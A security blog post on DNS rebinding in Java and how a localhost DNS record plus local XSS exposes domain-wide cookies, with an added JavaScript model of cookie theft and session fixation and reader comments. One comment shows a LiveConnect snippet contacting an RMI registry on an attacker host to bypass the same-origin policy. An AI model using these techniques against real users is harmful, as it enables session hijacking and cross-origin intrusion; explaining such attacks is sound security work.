web application security lab

DNS Rebinding In Java Is Back


Stefano Di Paola has an interesting article about DNS rebinding in Java. Apparently he has found a way to bring back some of the older exploits that were supposedly fixed in Java in the 2007-2008 timeframe. Really cool read. Halfway through reading it I realized that this would enable exploits like the one where sites often have a DNS record such as localhost.whatever.com pointing back to 127.0.0.1. The old exploit worked like this: if you could ever find an XSS in a service listening on the local machine, loading it through that hostname put your script in an origin under whatever.com, so it could set cookies for the whole whatever.com domain, or read any cookies that were scoped to the entire domain. It’s a nasty exploit, but a rare one, because there don’t tend to be a lot of local services installed on desktop computers that are vulnerable to XSS by default.

Then I kept reading, and he enumerates that exact use case - great minds think alike! Anyway, this apparently will be fixed in a future update, but now that we’ve seen DNS rebinding hit Java twice, I think Java needs a much more critical eye. Things like this shouldn’t be sitting around for years before they’re noticed. Like inter-protocol exploitation, this kind of research needs a lot more eyes. Great work by Stefano!
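The cookie-scoping consequence described above, modelled as an added example that is not part of the original post or of Stefano’s research: a minimal in-memory cookie jar that applies the RFC 6265 domain rules, used to show that script running in the origin localhost.whatever.com (a hostname that resolves to 127.0.0.1) both receives whatever.com’s domain-wide cookies and may plant its own for that domain. The hostnames, cookie names and values are constructed for the demo, and the jar is a stand-in for the browser’s cookie store, not a real browser API.

```javascript
// Added example (not from the original post). Models why a DNS record like
// localhost.whatever.com -> 127.0.0.1 turns an XSS in a local service into a
// cookie-theft / cookie-planting primitive against whatever.com.
// Hostnames and cookie values are constructed; the jar is an in-memory
// stand-in for the browser's cookie store.

// RFC 6265 section 5.1.3 domain-match: the host equals the domain, or the
// host ends with "." + domain (both lower-case, no trailing dot).
function domainMatches(host, domain) {
  host = host.toLowerCase();
  domain = domain.toLowerCase();
  return host === domain || host.endsWith("." + domain);
}

// Parse a Set-Cookie header value into {name, value, domain, hostOnly}.
// `setter` is the host whose response carried the header. Returns null
// when the cookie must be rejected.
function parseSetCookie(header, setter) {
  const parts = header.split(";").map((p) => p.trim());
  const [name, ...rest] = parts[0].split("=");
  const cookie = {
    name: name.trim(),
    value: rest.join("=").trim(),
    domain: setter.toLowerCase(),
    hostOnly: true,
  };
  for (const attr of parts.slice(1)) {
    const [k, v = ""] = attr.split("=");
    if (k.trim().toLowerCase() === "domain" && v.trim() !== "") {
      let d = v.trim().toLowerCase();
      if (d.startsWith(".")) d = d.slice(1); // leading dot is ignored (5.2.3)
      // A host may only set a Domain it domain-matches; otherwise the
      // cookie is ignored (RFC 6265 section 5.3, step 6).
      if (!domainMatches(setter, d)) return null;
      cookie.domain = d;
      cookie.hostOnly = false;
    }
  }
  return cookie;
}

// In-memory cookie jar: store a cookie set by `setter`, and list the
// cookies that would be sent to `host`.
class CookieJar {
  constructor() {
    this.cookies = [];
  }
  setFrom(setter, header) {
    const c = parseSetCookie(header, setter);
    if (c === null) return false;
    // A cookie with the same name and domain replaces the old one.
    this.cookies = this.cookies.filter(
      (e) => !(e.name === c.name && e.domain === c.domain)
    );
    this.cookies.push(c);
    return true;
  }
  cookiesFor(host) {
    host = host.toLowerCase();
    return this.cookies
      .filter((c) => (c.hostOnly ? host === c.domain : domainMatches(host, c.domain)))
      .map((c) => `${c.name}=${c.value}`);
  }
}

// Constructed scenario: whatever.com's main site sets a domain-wide session
// cookie; an XSS in a local service reachable as localhost.whatever.com
// (127.0.0.1) then runs script in that origin.
function demo() {
  const jar = new CookieJar();
  jar.setFrom("www.whatever.com", "sid=real-session; Domain=.whatever.com; Path=/");

  // Reading: the domain-wide cookie is sent to localhost.whatever.com too,
  // so injected script there sees it in document.cookie.
  const leaked = jar.cookiesFor("localhost.whatever.com");

  // Writing: the same script may set a cookie for whatever.com (session
  // fixation), because localhost.whatever.com domain-matches whatever.com.
  const planted = jar.setFrom("localhost.whatever.com", "sid=attacker-chosen; Domain=whatever.com; Path=/");
  const seenByMainSite = jar.cookiesFor("www.whatever.com");

  // Control: an unrelated host cannot set a cookie scoped to whatever.com.
  const rejected = jar.setFrom("evil.example", "sid=x; Domain=whatever.com");

  return { leaked, planted, seenByMainSite, rejected };
}

console.log(JSON.stringify(demo(), null, 2));
```

The point of the control case at the end is that the domain rule is doing its job: evil.example is refused, and the only reason localhost.whatever.com is accepted is that whatever.com chose to point one of its own subdomains at the user’s machine.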

3 Responses to “DNS Rebinding In Java Is Back”

  1. Joshbw Says:

    There are a lot of other reasons why Java needs to have a much more critical eye:

    http://arstechnica.com/business/news/2010/10/microsoft-sees-unprecedented-wave-of-java-malware-exploits.ars

    I gave up on client side Java a long time ago. Most of the apps using it are utterly terrible and Sun/Oracle can’t seem to write a secure runtime for clients. A JVM is not touching my desktop.

  2. Stefano Di Paola Says:

    Hey Robert, thanks for the kind words :)

    I hope the issue has been fixed in Java update 22. But I didn’t check if there are any bypasses.

    Consider reading the following post:
    http://blog.mindedsecurity.com/2010/10/java-dsn-rebinding-java-same-ip-policy.html

    which describes what could happen when putting together DNS Rebinding and the Java Same IP Origin Policy.

  3. Sasha Says:

    Java has many dark alleys.

    Java Remote Method Invocation (RMI) through JS LiveConnect, for example: java.rmi in JavaScript:

    // LiveConnect exposes the java.* packages to page script: look up an RMI
    // registry on an attacker-controlled host and call a remote object.
    var c = java.rmi.registry.LocateRegistry;
    var r = c.getRegistry("hello.evil.com");  // registry on that host (default port 1099)
    var s = r.lookup("lol");                   // stub bound under the name "lol"
    s.requestService();                        // invoke a method on the remote object

    Then the attacker can set up and run his own remote Java application that allows any IP to communicate with that client, thus bypassing SOP. Not to mention Naming.rebind() :D

    So yeah, running Java in your browser these days is asking for problems. Enjoy. ;)